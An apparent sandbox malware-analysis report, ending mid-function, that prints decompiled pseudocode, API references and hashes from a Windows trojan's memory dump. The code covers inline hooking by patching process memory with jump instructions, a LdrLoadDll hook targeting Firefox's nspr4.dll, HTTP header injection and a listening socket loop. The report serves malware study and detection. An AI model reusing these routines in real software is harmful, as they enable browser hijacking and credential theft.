Part of subcall function 0040ABED: StrStrIW.SHLWAPI(?,?), ref: 0040ACAC
Part of subcall function 0040ABED: StrStrIW.SHLWAPI(?,?), ref: 0040ACBD
Part of subcall function 0040ABED: GetPrivateProfileStringW.KERNEL32 ref: 0040ACD9
Part of subcall function 0040ABED: GetPrivateProfileStringW.KERNEL32 ref: 0040ACF7

PathRemoveFileSpecW.SHLWAPI(?,?,00000003,?,00000000), ref: 0040AE5C

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040AED2
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000), ref: 0040AF6F

Strings

&, xrefs: 0040AEB0
$, xrefs: 0040AEA2
#, xrefs: 0040AEB7

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
String ID: #$$$&
API String ID: 1517737059-1941049543
Opcode ID: 3fe7da56c6f8d3e8d56c804d6f45767b58f70885738e988b77ed123a81aeddd5
Instruction ID: edf8830f3ae155e624e2b7af056615301be6ae238e1acbd531456aab1855f515
Opcode Fuzzy Hash: 3fe7da56c6f8d3e8d56c804d6f45767b58f70885738e988b77ed123a81aeddd5
Instruction Fuzzy Hash: 91512CB2E00219AADF10EBA1DC45FDFB7BCAB08314F100567B604F7191DB78AA858B95

Uniqueness

Uniqueness Score: -1.00%

Function 004156FA, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 108
injectionCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004156FA(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
				char _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr* _t67;
				long _t69;
				DWORD* _t70;
				void* _t72;

				_t64 = __edx;
				_t62 = __ecx;
				_t59 = __eax;
				_t70 = 0;
				_v12 = 0;
				if(E004156B5(_a4) < 0x1e) {
					L18:
					return _v12;
				}
				_t3 =  &_v8; // 0x40652b
				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
					goto L18;
				}
				E004111B9( &_v48,  &_v48, 0xffffff90, 0x23);
				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
					L17:
					_t31 =  &_v8; // 0x40652b
					_t32 =  &_v8; // 0x40652b
					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t32, _t31);
					goto L18;
				} else {
					_t67 =  &_v48;
					_push(0);
					_push(_t67);
					while(1) {
						_t48 = E00419B20(_t59, _t62, _t64, _t67, _t70);
						if(_t48 == 0xffffffff) {
							break;
						}
						_t70 = _t70 + _t48;
						if(_t70 > 0x1e) {
							L16:
							goto L17;
						}
						_t62 =  *_t67;
						if(_t62 == 0xe9 || _t62 == 0xe8) {
							if(_t48 == 5) {
								_t10 =  &_a8; // 0x41e020
								 *((intOrPtr*)(_t67 + 1)) =  *((intOrPtr*)(_t67 + 1)) + _a4 -  *_t10;
							}
						}
						_push(0);
						if(_t70 >= 5) {
							_t16 =  &_a8; // 0x41e020
							_t17 = _t70 + 5; // 0x5
							_t69 = _t17;
							 *((intOrPtr*)(_t72 + _t70 - 0x2b)) = _a4 -  *_t16 - 5;
							_t21 =  &_a8; // 0x41e020
							 *((char*)(_t72 + _t70 - 0x2c)) = 0xe9;
							if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t69, ??) != 0) {
								_v48 = 0xe9;
								_v47 = _t59 - _a4 - 5;
								E0040EC7E(_a4, _a8);
								if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
									_v12 = _t69;
								}
							}
							goto L16;
						}
						_t67 = _t72 + _t70 - 0x2c;
						_push(_t67);
					}
					goto L16;
				}
			}

0x004156fa
0x004156fa
0x00415702
0x00415707
0x00415709
0x00415714
0x00415810
0x00415816
0x00415816
0x0041571a
0x0041572f
0x00000000
0x00000000
0x0041573d
0x00415756
0x004157fc
0x004157fc
0x00415800
0x0041580a
0x00000000
0x0041575c
0x0041575d
0x00415760
0x00415763
0x00415797
0x00415797
0x0041579f
0x00000000
0x00000000
0x00415766
0x0041576b
0x004157fb
0x00000000
0x004157fb
0x00415771
0x00415776
0x00415780
0x00415785
0x00415788
0x00415788
0x00415780
0x0041578b
0x00415790
0x004157a6
0x004157a9
0x004157a9
0x004157af
0x004157b8
0x004157bb
0x004157cc
0x004157d9
0x004157dd
0x004157e0
0x004157f6
0x004157f8
0x004157f8
0x004157f6
0x00000000
0x004157cc
0x00415792
0x00415796
0x00415796
0x00000000
0x004157a1

APIs

Part of subcall function 004156B5: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,0040EC1E,00000000,00000000,00000032,0040EF95,0041E020,00000000), ref: 004156CA

VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,+e@,-00000008,00000032,?,?,0040ED3F,?,00000000,?,?,0040EF95,0041E020), ref: 00415727
ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,0040ED3F,?,00000000,?,?,0040EF95), ref: 0041574E
WriteProcessMemory.KERNEL32(000000FF, A,?,00000005,00000000,?,00000000,00000000,?,?,0040ED3F,?,00000000,?,?,0040EF95), ref: 004157C8
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,0040ED3F,?,00000000,?,?,0040EF95,0041E020,00000000,0040652B), ref: 004157F2
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,+e@,+e@,?,?,0040ED3F,?,00000000,?,?,0040EF95,0041E020,00000000,0040652B), ref: 0041580A

Strings

+e@, xrefs: 0041571A, 004157FC, 00415800, 0041571D, 004157FF
A, xrefs: 004157A6, 004157B8, 00415785

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID: A$+e@
API String ID: 390532180-1592565953
Opcode ID: df8b70a94ba76f7af3d9ecf9f1f792a72c095d449639a1daba5e5dd9c3f58b48
Instruction ID: 41959f0baa7f229b579e03bce59da075f927d1956974390ca96231d6ecea360f
Opcode Fuzzy Hash: df8b70a94ba76f7af3d9ecf9f1f792a72c095d449639a1daba5e5dd9c3f58b48
Instruction Fuzzy Hash: 93317236900608EBDF10DFBCCD85EEE7BA9AB49730F508316F935A61D0D674D9818B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAE4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040EAE4(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				void* __edi;
				void* _t12;
				long _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				UNICODE_STRING* _t24;
				void* _t28;
				HMODULE* _t29;
				struct _OBJDIR_INFORMATION _t31;

				if(E00406B23() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x41e5c4(_a4, 0, _t24, _t29, _t23, _t28, _t17);
					_t13 = LdrLoadDll(_a4, _a8, _t24, _t29);
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
						EnterCriticalSection(0x41ec44);
						if(( *0x41ec5c & 0x00000001) == 0) {
							_t31 =  *_t29;
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
								_t16 = 0;
							} else {
								_t16 = E0040EF97(_t21, _t22, _t31);
							}
							if(_t16 != 0) {
								 *0x41ec5c =  *0x41ec5c | 0x00000001;
							}
						}
						LeaveCriticalSection(0x41ec44);
					}
					return _a4;
				}
				goto ( *0x41e5c0);
			}

0x0040eaee
0x0040eaf9
0x0040eafd
0x0040eb07
0x0040eb17
0x0040eb1d
0x0040eb22
0x0040eb3b
0x0040eb48
0x0040eb4d
0x0040eb5d
0x0040eb68
0x0040eb5f
0x0040eb61
0x0040eb61
0x0040eb6c
0x0040eb6e
0x0040eb6e
0x0040eb6c
0x0040eb76
0x0040eb76
0x0040eb83
0x0040eb83
0x0040eaf1

APIs

Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0040EB07
LdrLoadDll.NTDLL(?,?,?,?), ref: 0040EB17
EnterCriticalSection.KERNEL32(0041EC44), ref: 0040EB3B
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0040EB55
LeaveCriticalSection.KERNEL32(0041EC44), ref: 0040EB76

Strings

@xw, xrefs: 0040EAF1, 0040EB17
nspr4.dll, xrefs: 0040EB4F

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterHandleLeaveLoadObjectSingleWaitlstrcmpi
String ID: @xw$nspr4.dll
API String ID: 2984399785-1669710511
Opcode ID: 5cbf7ff700ecc311304ec52c169fea240a6263fb1bf503257316d8b3966ca321
Instruction ID: 21631a6d6ca1eff474960308faf5c0964e2382f6263bd28ab1c785c413005d9e
Opcode Fuzzy Hash: 5cbf7ff700ecc311304ec52c169fea240a6263fb1bf503257316d8b3966ca321
Instruction Fuzzy Hash: E011BF35200214ABCB119F539C44F9B7FB8EF49755F14443AFD42B32A1D738A821CE98

Uniqueness

Uniqueness Score: -1.00%

Function 00418CBA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418CBA(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x420038 =  *0x420038 & 0x00000000;
				 *0x42003c =  *0x42003c & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x42001c);
				 *0x420034 = _a4;
				 *0x420010 = _a8;
				 *0x420040 = _a12;
				 *0x420014 = _t14;
				 *0x42000c = _a16;
				 *0x420008 = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x420018 = GetProcAddress( *0x420014, "PR_SetError");
				_t12 = GetProcAddress( *0x420014, "PR_GetError");
				 *0x420004 = _t12;
				return _t12;
			}

0x00418cba
0x00418cc1
0x00418cce
0x00418cd0
0x00418cda
0x00418ce3
0x00418cf1
0x00418cfa
0x00418d07
0x00418d19
0x00418d2b
0x00418d30
0x00418d32
0x00418d38

APIs

InitializeCriticalSection.KERNEL32(0042001C,74B04EE0,0040F005,0041E340), ref: 00418CD0
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00418D0C
GetProcAddress.KERNEL32(PR_SetError), ref: 00418D1E
GetProcAddress.KERNEL32(PR_GetError), ref: 00418D30

Strings

PR_GetError, xrefs: 00418D20
PR_SetError, xrefs: 00418D0E
PR_GetNameForIdentity, xrefs: 00418CEC

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: f5702b05a45b0b7cdbe2fae046892c1d35f44c9808349889d344981dcf1d5510
Instruction ID: b88a209b825abcea9928b83cfd2038a5760dd19bba0caf806aebb136e5417e81
Opcode Fuzzy Hash: f5702b05a45b0b7cdbe2fae046892c1d35f44c9808349889d344981dcf1d5510
Instruction Fuzzy Hash: 6701EFB5A003149FE730EF24FD48B06BFE0E748361B90883AA548A3262D3789406DF9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE43, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FE43(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v104;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v125;
				char _v128;
				char _v136;
				intOrPtr _v172;
				char _v173;
				signed int _v176;
				intOrPtr _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t85;
				signed int _t88;
				intOrPtr _t89;
				void* _t92;
				void* _t96;
				void* _t100;
				signed int _t107;
				intOrPtr _t108;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				signed char* _t119;
				signed int _t120;
				struct _CRITICAL_SECTION* _t126;
				intOrPtr _t131;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;

				_v120 = _v120 | 0xffffffff;
				_t122 =  &_v76;
				if(E0040FD28( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E00408E76( &_v76);
					return _v120;
				}
				_t85 = E004085D4(_t122);
				_v120 = _t85;
				if((1 & _t85) == 0) {
					__eflags = _t85 & 0x00000002;
					if((_t85 & 0x00000002) == 0) {
						_t126 = 0x41ec60;
						L18:
						__eflags = _v116 & 0x00000004;
						if((_v116 & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v40;
						 *_a12 = _v36;
						EnterCriticalSection(_t126);
						_t146 = _a4;
						_t88 = E0040F357(_a4);
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							L21:
							_t89 =  *0x41ec78; // 0x0
							_t148 = _t88 * 0x24;
							__eflags = _t148;
							E00411106( *((intOrPtr*)(_t148 + _t89 + 8)));
							_t131 =  *0x41ec78; // 0x0
							 *((intOrPtr*)(_t148 + _t131 + 8)) = _v44;
							L22:
							LeaveCriticalSection(_t126);
							goto L23;
						}
						_t88 = E0040F37D(_t88, _t146);
						__eflags = _t88 - 0xffffffff;
						if(_t88 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v124 = _v124 & 0x00000000;
					_v125 = 1;
					__eflags = _v16 - 1;
					if(_v16 != 1) {
						L9:
						_t138 =  &_v104;
						_t92 = 0x21;
						E0040C9FD(_t92, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v128;
						_t96 = 0x22;
						E0040C9FD(_t96, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 =  &_v136;
						_t100 = 0x23;
						E0040C9FD(_t100, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t126 = 0x41ec60;
						EnterCriticalSection(0x41ec60);
						__eflags = _v173;
						if(_v173 == 0) {
							L14:
							E00408EE0(_v64, _v68);
							__eflags = _v176;
							if(_v176 != 0) {
								E00412D93(_v172);
							}
							L16:
							LeaveCriticalSection(_t126);
							goto L18;
						}
						_t150 = _a4;
						_t107 = E0040F357(_a4);
						__eflags = _t107 - 0xffffffff;
						if(_t107 != 0xffffffff) {
							L13:
							_t108 =  *0x41ec78; // 0x0
							_t142 = _t107 * 0x24;
							E00408EE0( *((intOrPtr*)(_t108 + _t142 + 0x10)),  *((intOrPtr*)(_t108 + _t142 + 0xc)));
							_t111 =  *0x41ec78; // 0x0
							E00411106( *((intOrPtr*)(_t142 + _t111 + 0x14)));
							_t113 =  *0x41ec78; // 0x0
							 *(_t142 + _t113 + 0x14) =  *(_t142 + _t113 + 0x14) & 0x00000000;
							_t114 =  *0x41ec78; // 0x0
							 *(_t142 + _t114 + 0x1c) =  *(_t142 + _t114 + 0x1c) & 0x00000000;
							_t115 =  *0x41ec78; // 0x0
							 *(_t142 + _t115 + 0x18) =  *(_t142 + _t115 + 0x18) | 0xffffffff;
							_t116 =  *0x41ec78; // 0x0
							 *((intOrPtr*)(_t142 + _t116 + 0xc)) = _v76;
							_t117 =  *0x41ec78; // 0x0
							 *((intOrPtr*)(_t142 + _t117 + 0x10)) = _v72;
							_t118 =  *0x41ec78; // 0x0
							 *((intOrPtr*)(_t142 + _t118 + 0x20)) = _v180;
							goto L16;
						}
						_t107 = E0040F37D(_t107, _t150);
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t119 = _v20;
					__eflags =  *_t119 & 0x00000003;
					if(( *_t119 & 0x00000003) == 0) {
						goto L9;
					}
					_t120 = E0040913B(_t119,  &_v76);
					_v124 = _t120;
					__eflags = _t120;
					if(_t120 != 0) {
						_v120 = 1;
					} else {
						_v125 = _t120;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v120 = _v120 & 0x00000000;
					goto L23;
				}
			}

0x0040fe4f
0x0040fe5e
0x0040fe6c
0x00410054
0x00410058
0x00410067
0x00410067
0x0040fe75
0x0040fe7d
0x0040fe83
0x0040fe9a
0x0040fe9c
0x0040ffef
0x0040fff4
0x0040fff4
0x0040fff9
0x00000000
0x00000000
0x00410002
0x0041000c
0x0041000e
0x00410014
0x00410017
0x0041001c
0x0041001f
0x0041002c
0x0041002e
0x00410033
0x00410033
0x0041003a
0x00410043
0x00410049
0x0041004d
0x0041004e
0x00000000
0x0041004e
0x00410022
0x00410027
0x0041002a
0x00000000
0x00000000
0x00000000
0x0041002a
0x0040fea2
0x0040fea7
0x0040feab
0x0040feaf
0x0040fed7
0x0040fed9
0x0040fedd
0x0040fede
0x0040fef6
0x0040fefa
0x0040fefe
0x0040feff
0x0040ff12
0x0040ff16
0x0040ff1a
0x0040ff1b
0x0040ff29
0x0040ff2b
0x0040ff2b
0x0040ff31
0x0040ff37
0x0040ff3c
0x0040ffc6
0x0040ffd1
0x0040ffd6
0x0040ffdb
0x0040ffe1
0x0040ffe1
0x0040ffe6
0x0040ffe7
0x00000000
0x0040ffe7
0x0040ff42
0x0040ff45
0x0040ff4a
0x0040ff4d
0x0040ff5a
0x0040ff5c
0x0040ff61
0x0040ff6c
0x0040ff71
0x0040ff7a
0x0040ff7f
0x0040ff84
0x0040ff89
0x0040ff8e
0x0040ff93
0x0040ff98
0x0040ff9d
0x0040ffa6
0x0040ffaa
0x0040ffb3
0x0040ffb7
0x0040ffc0
0x00000000
0x0040ffc0
0x0040ff50
0x0040ff55
0x0040ff58
0x00000000
0x00000000
0x00000000
0x0040ff58
0x0040feb1
0x0040feb5
0x0040feb8
0x00000000
0x00000000
0x0040febe
0x0040fec3
0x0040fec7
0x0040fec9
0x0040fed1
0x0040fecb
0x0040fecb
0x0040fecb
0x00000000
0x0040fe85
0x0040fe8a
0x0040fe90
0x00000000
0x0040fe90

APIs

Part of subcall function 004085D4: EnterCriticalSection.KERNEL32(0041EAA4), ref: 004085EF
Part of subcall function 004085D4: LeaveCriticalSection.KERNEL32(0041EAA4), ref: 00408672

SetLastError.KERNEL32(00002F78), ref: 0040FE8A
EnterCriticalSection.KERNEL32(0041EC60), ref: 0040FF31
LeaveCriticalSection.KERNEL32(0041EC60,?), ref: 0040FFE7
EnterCriticalSection.KERNEL32(0041EC60), ref: 0041000E
LeaveCriticalSection.KERNEL32(0041EC60,?), ref: 0041004E

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: ddbe302c3affdafc5001f5c9e62f006774170469e6a27250f69799d2767f235a
Instruction ID: e92ef40181787d94f9af9d4d56abd23c2f26d8fd392adcc07a221414a00d0bcb
Opcode Fuzzy Hash: ddbe302c3affdafc5001f5c9e62f006774170469e6a27250f69799d2767f235a
Instruction Fuzzy Hash: 25518D31504345DBD720DF29DC84A9ABBA0EF45328F104A3EF9A4A72F1C738D885CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040F175, Relevance: 12.2, APIs: 8, Instructions: 152
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040F175(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				long _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				long _t48;
				void* _t49;
				void* _t55;
				long _t56;
				long _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				long _t69;
				void* _t72;
				long _t77;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E004069FD(__ecx, __eflags, 0x918317b5, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					_t48 = E00406B23();
					__eflags = _t48;
					if(_t48 == 0) {
						L26:
						E004147B3(_v148);
						_t49 = 0;
						__eflags = 0;
						L27:
						return _t49;
					}
					E00404956(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E0040F0A4( &_v160, _v78,  &_v168) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 != 0) {
						L7:
						__eflags = _t94 - _v74;
						if(_t94 != _v74) {
							E00404A11( &_v124);
							_v78 = _t94;
							E00404A69( &_v128);
						}
						_t55 =  *0x41ea9c; // 0x0
						_v144 = _t55;
						_t56 = _v152;
						_v172 = 1;
						__eflags = _t56;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						__eflags = _t57;
						if(_t57 != 0) {
							_t87 = _v172;
							_t20 =  &_v172;
							 *_t20 = _v172 + 1;
							__eflags =  *_t20;
							 *(_t100 + 0x2c + _v172 * 4) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						__eflags = _t59;
						if(_t59 <= 0) {
							L25:
							E004143C5(_t59, _v156);
							E004143C5(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(1) {
								__eflags = _t59 - _v172;
								if(_t59 >= _v172) {
									goto L25;
								}
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								__eflags = _t64 - _v152;
								if(_t64 != _v152) {
									__eflags = _t64 - _v160;
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											__eflags = _t97 - 0xffffffff;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E004143DB(_t87, _t97);
											_t69 = E00412B3B(0x20000, E0040F12C, _t97);
											__eflags = _t69;
											if(_t69 == 0) {
												E004143C5(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										__eflags = _t59;
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t77 = WaitForSingleObject( *0x41ea9c, 0x3e8);
						__eflags = _t77 - 0x102;
						if(_t77 != 0x102) {
							break;
						}
						_t87 = _v74;
						_t94 = E0040F0A4( &_v156, _v74,  &_v164) & 0x0000ffff;
						__eflags = _t94;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					__eflags = _t94;
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x0040f17b
0x0040f186
0x0040f18d
0x0040f194
0x0040f19a
0x0040f1a4
0x0040f1a9
0x0040f1ab
0x0040f343
0x0040f347
0x0040f34c
0x0040f34c
0x0040f34e
0x0040f354
0x0040f354
0x0040f1b6
0x0040f1bb
0x0040f1cd
0x0040f1d0
0x0040f1d3
0x0040f210
0x0040f210
0x0040f215
0x0040f21c
0x0040f226
0x0040f22b
0x0040f22b
0x0040f230
0x0040f235
0x0040f239
0x0040f23d
0x0040f245
0x0040f247
0x0040f249
0x0040f24d
0x0040f24d
0x0040f251
0x0040f255
0x0040f257
0x0040f259
0x0040f25d
0x0040f25d
0x0040f25d
0x0040f261
0x0040f261
0x0040f271
0x0040f277
0x0040f279
0x0040f31f
0x0040f323
0x0040f338
0x0040f341
0x00000000
0x0040f27f
0x0040f27f
0x0040f285
0x0040f285
0x0040f289
0x00000000
0x00000000
0x0040f28f
0x0040f293
0x0040f297
0x0040f29f
0x0040f2a3
0x0040f2f7
0x0040f2f7
0x0040f2fd
0x0040f2ff
0x0040f301
0x0040f304
0x00000000
0x00000000
0x0040f2b2
0x0040f2ce
0x0040f2d2
0x0040f2d9
0x0040f2e9
0x0040f2ee
0x0040f2f0
0x0040f2f2
0x0040f2f2
0x0040f2f0
0x0040f311
0x0040f317
0x0040f319
0x00000000
0x00000000
0x00000000
0x0040f319
0x0040f2a5
0x0040f2a9
0x0040f2a9
0x00000000
0x0040f2a9
0x0040f299
0x00000000
0x0040f299
0x00000000
0x0040f285
0x00000000
0x00000000
0x00000000
0x0040f1d5
0x0040f1d5
0x0040f1e0
0x0040f1e6
0x0040f1eb
0x00000000
0x00000000
0x0040f1ed
0x0040f1ff
0x0040f202
0x0040f205
0x00000000
0x00000000
0x00000000
0x0040f205
0x0040f207
0x0040f20a
0x00000000
0x00000000
0x00000000
0x0040f20a
0x0040f19e
0x00000000

APIs

Part of subcall function 004069FD: CreateMutexW.KERNEL32(0041E5C8,00000000,?,?,?,?,?), ref: 00406A1E

WaitForSingleObject.KERNEL32(000003E8,?,?,918317B5,00000002), ref: 0040F1E0
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,918317B5), ref: 0040F271
accept.WS2_32(?,00000000,00000000), ref: 0040F2FD
WaitForMultipleObjects.KERNEL32(?,00000000,00000000,00000000), ref: 0040F311
CloseHandle.KERNEL32(?), ref: 0040F332
CloseHandle.KERNEL32(?), ref: 0040F341

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
String ID:
API String ID: 38240579-0
Opcode ID: 2bfbcb803a7d65ac97ce39781f5fae34228dbde4b9de0fe099c7bd476a8a889f
Instruction ID: 03fa2585404e0584e9edb39c913ccfe61fbe07955eddfaf14f33c9b2e8c747b4
Opcode Fuzzy Hash: 2bfbcb803a7d65ac97ce39781f5fae34228dbde4b9de0fe099c7bd476a8a889f
Instruction Fuzzy Hash: FA518C75108241ABC720EF66DC84C6FBBE9EBC4714F100A3EF991E35A0D7399C488B1A

Uniqueness

Uniqueness Score: -1.00%

Function 00408A1C, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 365
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00408A1C(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed short* _v36;
				signed short* _v40;
				signed int _v44;
				signed short* _v48;
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				struct _SYSTEMTIME _v76;
				signed int _v92;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed short _v116;
				char _v120;
				char _v124;
				char _v140;
				char _v184;
				intOrPtr _v232;
				char* _v236;
				void* _v252;
				char _v256;
				char _v272;
				struct _SYSTEMTIME _v288;
				char _v552;
				char _v1072;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				void* _t188;
				void* _t199;
				signed int _t211;
				signed int _t215;
				signed int _t218;
				signed char _t222;
				signed int _t224;
				void* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t240;
				void* _t242;
				signed int _t250;
				intOrPtr* _t252;
				signed int _t253;
				signed short _t256;
				short* _t259;
				void* _t278;
				signed short* _t282;
				signed int _t287;
				long _t288;
				signed short* _t290;
				signed short* _t292;
				signed int _t295;
				intOrPtr* _t297;
				void* _t301;
				void* _t302;

				_v44 = _v44 & 0x00000000;
				if(__eax == 0) {
					L52:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t282 = __ecx + 0x10;
					_v28 = _t282;
					_v52 = __eax;
					do {
						_t256 =  *_t282;
						_t277 =  *(_t282 - 0x10) >> 0x0000000a & 0x00000008;
						_v56 = _t277;
